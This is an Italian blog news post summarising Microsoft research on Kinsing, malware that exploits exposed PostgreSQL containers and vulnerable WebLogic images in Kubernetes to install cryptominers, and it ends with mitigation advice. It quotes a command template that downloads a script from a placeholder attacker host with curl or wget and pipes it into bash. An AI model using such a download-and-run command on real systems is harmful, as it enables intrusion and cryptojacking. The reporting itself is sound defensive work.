Kinsing, un malware che usa WebLogic e PostgreSQL per installare cryptominer in Kubernetes
Si chiama Kinsing ed è un malware che, pur utilizzando tecniche di attacco ben conosciute, sta attaccando installazioni di Kubernetes che hanno esposto i container PostgreSQL, ovviamente mal configurati.
La parte interessante di questo malware, che è stato ampiamente descritto dal team di Microsoft Defender for Cloud è che riguarda immagini di container ritenute vulnerabili. I ricercatori ne citano alcune il cui utilizzo è quantomeno diffuso, vedi:
- PHPUnit
- Liferay
- WebLogic
- WordPress
Nel caso descritto relativo a WebLogic (piattaforma di sviluppo prodotta da Oracle) gli attacchi iniziano con la scansione di un’ampia gamma di indirizzi IP, alla ricerca di una porta aperta che corrisponda alla porta predefinita di WebLogic (7001).
Se vulnerabili, gli aggressori possono utilizzare uno degli exploit per eseguire il loro payload dannoso (Kinsing, per l’appunto). Il metodo principale che abbiamo osservato è stato l’esecuzione di un comando dannoso con la seguente struttura:
“/bin/bash -c (curl -s Attacker_IP/Payload_Name.sh||wget -q -O-Attacker_IP/Payload_Name.sh)|bash”
E da lì, come di dice, inizia la magia!
La modalità di attacco è riassunta in questo schema:
E riassume quanto abbiamo spiegato.
Per approfondimenti c’è anche l’interessante articolo “Microsoft: Kubernetes clusters hacked in malware campaign via PostgreSQL” di BleepingComputer.
Mitigazioni? Quasi è inutile ripeterle: utilizzare solo immagini certificate, evitare di utilizzare i permessi di PostgreSQL in maniera erronea, una su tutte l’esposizione diretta della porta del servizio.
Del resto, chi può essere così sciocco da esporre su internet la porta del proprio database di produzione?
Raoul Scarazzini
Da sempre appassionato del mondo open-source e di Linux nel 2009 ho fondato il portale Mia Mamma Usa Linux! per condividere articoli, notizie ed in generale tutto quello che riguarda il mondo del pinguino, con particolare attenzione alle tematiche di interoperabilità, HA e cloud.
E, sì, mia mamma usa Linux dal 2009.
Se vuoi sostenerci, puoi farlo acquistando qualsiasi cosa dai diversi link di affiliazione che abbiamo nel nostro sito o partendo da qui oppure alcune di queste distribuzioni GNU/Linux che sono disponibili sul nostro negozio online, quelle mancanti possono essere comunque richieste, e su cui trovi anche PC, NAS e il ns ServerOne. Se ti senti generoso, puoi anche donarmi solo 1€ o più se vuoi con PayPal e aiutarmi a continuare a pubblicare più contenuti come questo. Grazie!
Hai dubbi o problemi? Ti aiutiamo noi!
Se vuoi rimanere sempre aggiornato, iscriviti al nostro canale Telegram.Se vuoi ricevere supporto per qualsiasi dubbio o problema, iscriviti alla nostra community Facebook o gruppo Telegram.
Cosa ne pensi? Fateci sapere i vostri pensieri nei commenti qui sotto.
Ti piace quello che leggi? Per favore condividilo con gli altri.